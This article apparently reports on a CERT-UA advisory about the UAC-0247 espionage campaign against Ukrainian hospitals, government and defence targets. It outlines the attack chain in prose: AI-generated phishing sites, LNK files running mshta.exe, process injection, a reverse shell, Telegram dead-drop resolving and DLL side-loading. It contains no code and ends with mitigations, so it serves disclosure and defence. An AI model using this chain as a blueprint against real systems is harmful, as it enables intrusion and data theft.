Ukrainian Healthcare and Government Institutions Targeted by Sophisticated UAC-0247 Malware Campaign Delivering Data-Stealing AGINGFLY Payloads

The Computer Emergencies Response Team of Ukraine (CERT-UA) has issued a comprehensive advisory regarding a newly identified cyberespionage campaign targeting the nation’s critical infrastructure. This activity, attributed to a threat cluster designated as UAC-0247, has specifically focused on government agencies and municipal healthcare institutions, including emergency hospitals and clinics. The campaign, which was active throughout March and April 2026, utilizes a complex multi-stage infection chain designed to exfiltrate sensitive user data from Chromium-based web browsers and the WhatsApp messaging platform. While the precise geographic origin of UAC-0247 remains unconfirmed, the sophistication of the tools and the specific nature of the targets suggest a high level of coordination and a clear strategic objective.

The emergence of this campaign underscores the persistent and evolving nature of the cyber threats facing Ukraine’s public sector. Since 2022, Ukrainian institutions have been subjected to a relentless barrage of digital incursions, often coinciding with physical kinetic operations. However, the UAC-0247 campaign is notable for its use of modern techniques, including the leveraging of artificial intelligence (AI) to generate convincing social engineering content and the deployment of proprietary malware formats to evade traditional signature-based detection systems.

The Infection Vector: Social Engineering and AI Integration

The UAC-0247 campaign begins with highly targeted phishing emails. These messages are crafted to exploit the humanitarian crisis in the region, often masquerading as official proposals for humanitarian aid or medical support. By using themes that evoke urgency and altruism, the attackers significantly increase the likelihood that recipients will engage with the malicious content.

Within these emails is a link that directs the victim to a landing page. CERT-UA’s investigation revealed two distinct methods used to host these pages. In some instances, the threat actors exploited cross-site scripting (XSS) vulnerabilities on legitimate, pre-existing websites to inject their own malicious redirects. In other cases, they utilized AI-driven tools to create entirely new, highly professional-looking websites from scratch. These AI-generated sites are designed to mimic the appearance of legitimate NGOs or government portals, making it difficult for even vigilant users to distinguish them from authentic sources.

The ultimate goal of the landing page is to trick the user into downloading a Windows Shortcut (LNK) file. This file acts as the initial trigger for the subsequent stages of the infection. When the user executes the LNK file, it invokes a native Windows utility, "mshta.exe," to run a remote HTML Application (HTA). This "Living off the Land" (LotL) technique is a common strategy among advanced persistent threat (APT) groups, as it uses legitimate system tools to execute malicious code, thereby bypassing many security filters that focus on unrecognized executable files.

Technical Analysis of the Multi-Stage Execution Chain

The execution of the HTA file marks the transition from social engineering to technical exploitation. To keep the victim unaware of the background activity, the HTA file displays a decoy form—such as a fake registration document for humanitarian assistance. While the user is distracted by this form, the HTA script silently fetches a binary payload from a remote server.

This binary is responsible for injecting shellcode into a legitimate system process, frequently "runtimeBroker.exe." This process injection is a critical step in maintaining stealth, as it allows the malware to operate under the guise of a trusted Windows service. CERT-UA observed that recent iterations of this campaign have become even more complex, utilizing a two-stage loader. The second stage of this loader is implemented using a proprietary executable file format that supports custom code and data sections, function imports from dynamic libraries, and relocation tables. This level of customization suggests that the developers behind UAC-0247 are well-resourced and capable of creating bespoke tools to bypass standard antivirus and EDR (Endpoint Detection and Response) solutions.

The final payloads delivered through this chain are compressed and encrypted, further complicating the task of forensic analysis and detection. Once the environment is prepared, the attackers deploy a suite of specialized tools, including RAVENSHELL, SILENTLOOP, and the primary backdoor, AGINGFLY.

Payload Deep Dive: RAVENSHELL, SILENTLOOP, and AGINGFLY

The UAC-0247 toolkit is designed for both immediate tactical control and long-term intelligence gathering.

RAVENSHELL: This tool functions as a TCP reverse shell. Once active, it establishes a persistent connection with the attacker’s command-and-control (C2) server. This provides the threat actors with a direct line to the infected host’s command line interface (cmd.exe), allowing them to execute arbitrary commands, navigate the file system, and perform initial reconnaissance of the local network.

SILENTLOOP: This is a sophisticated PowerShell script designed to automate several key aspects of the malware’s lifecycle. SILENTLOOP includes functions for executing commands, updating its own configuration, and dynamically obtaining the current IP address of the C2 server. Interestingly, the script is programmed to check a specific Telegram channel for C2 updates—a technique known as "dead drop resolving." If Telegram is inaccessible, the script falls back to alternative mechanisms to ensure it remains in contact with the attackers.

AGINGFLY: The centerpiece of the campaign is AGINGFLY, a remote access Trojan (RAT) developed in C#. AGINGFLY uses WebSockets for communication, providing a full-featured interface for remote system management. Its capabilities include:

• Executing remote commands and scripts.
• Deploying and managing a keylogger to capture sensitive keystrokes.
• Uploading and downloading files between the host and the C2 server.
• Launching additional payloads or modules as needed for specific mission objectives.

Targeting Healthcare and Defense Sectors

The targeting of municipal healthcare institutions, particularly emergency hospitals, is a troubling aspect of the UAC-0247 campaign. In a conflict environment, the integrity of healthcare data and the availability of emergency services are paramount. By compromising these systems, attackers gain access to sensitive patient records, staff credentials, and internal communications, which can be used for further exploitation or to cause operational disruption.

Furthermore, CERT-UA has identified evidence suggesting that the campaign has extended its reach to the Defense Forces of Ukraine. In these instances, the delivery mechanism shifts slightly, utilizing the Signal messaging app to distribute malicious ZIP archives. These archives are designed to drop the AGINGFLY malware using a technique known as DLL side-loading. By placing a malicious DLL in the same directory as a legitimate executable, the malware can trick the system into loading the malicious code instead of the intended library.

The focus on both healthcare and defense suggests that UAC-0247 is interested in a broad spectrum of intelligence, ranging from the logistical capabilities of municipal services to the operational movements of military personnel.

Chronology of the Campaign

The activities of UAC-0247 were closely monitored by Ukrainian authorities over a two-month window:

• Early March 2026: Initial sightings of the "humanitarian aid" phishing emails. The first wave of attacks primarily targeted municipal clinics in eastern and central Ukraine.
• Mid-March 2026: Discovery of AI-generated landing pages. Analysts noted a marked improvement in the linguistic quality and visual design of the phishing sites compared to previous campaigns.
• Late March 2026: Identification of the proprietary two-stage loader. This marked a significant escalation in the technical complexity of the campaign.
• April 2026: The campaign expanded to include the Defense Forces via Signal. CERT-UA began observing the use of DLL side-loading to bypass endpoint security on military workstations.
• Mid-April 2026: CERT-UA issued its formal disclosure and technical advisory, providing indicators of compromise (IoCs) and mitigation strategies to the public and private sectors.

Broader Implications and Strategic Analysis

The UAC-0247 campaign is a stark reminder that the cyber domain remains a primary theater of modern conflict. The use of AI to generate phishing content represents a "democratization" of high-end social engineering, allowing threat actors to produce convincing lures at scale with minimal effort. This trend is likely to continue, making traditional user awareness training more challenging as the "red flags" of phishing become increasingly subtle.

The deployment of proprietary malware formats and the use of legitimate Windows utilities (LotL) reflect a broader shift toward "stealth-first" operations. By avoiding well-known malware families and utilizing the system’s own tools, UAC-0247 minimizes its digital footprint, allowing it to persist within a network for extended periods.

From a strategic perspective, the theft of data from Chromium-based browsers and WhatsApp is particularly damaging. These platforms often contain the "keys to the kingdom"—including saved passwords, session cookies, and private communications. With this data, attackers can move laterally through a network, accessing secondary systems without needing to trigger further exploits.

Recommendations and Mitigation Strategies

In response to the UAC-0247 threat, CERT-UA has recommended a series of aggressive defensive measures to minimize the attack surface of Ukrainian organizations. These include:

1. Restrict Script Execution: Organizations should implement policies to restrict or monitor the execution of LNK, HTA, and JS files, especially those originating from the internet or temporary directories.
2. Monitor Native Utilities: Close monitoring of native Windows utilities such as mshta.exe, powershell.exe, and wscript.exe is essential. Security teams should look for unusual parent-child process relationships, such as a browser launching mshta.exe.
3. Enhance Email Filtering: Deploying advanced email security solutions that can identify AI-generated text patterns and detect malicious redirects on compromised legitimate sites.
4. Endpoint Protection: Utilizing EDR tools that focus on behavioral analysis rather than just file signatures. This is critical for detecting process injection and DLL side-loading.
5. User Education: While phishing lures are becoming more sophisticated, employees should still be trained to verify the source of any unexpected "humanitarian" or "urgent" requests, particularly those involving file downloads or links.

The campaign attributed to UAC-0247 demonstrates that the cyber threat landscape is not static. As defensive technologies improve, threat actors are quick to integrate new tools like AI and custom-built loaders to maintain their advantage. For Ukraine and its international partners, the ongoing challenge remains the rapid identification and neutralization of these evolving threats before they can compromise the critical services upon which the civilian and military infrastructure depend.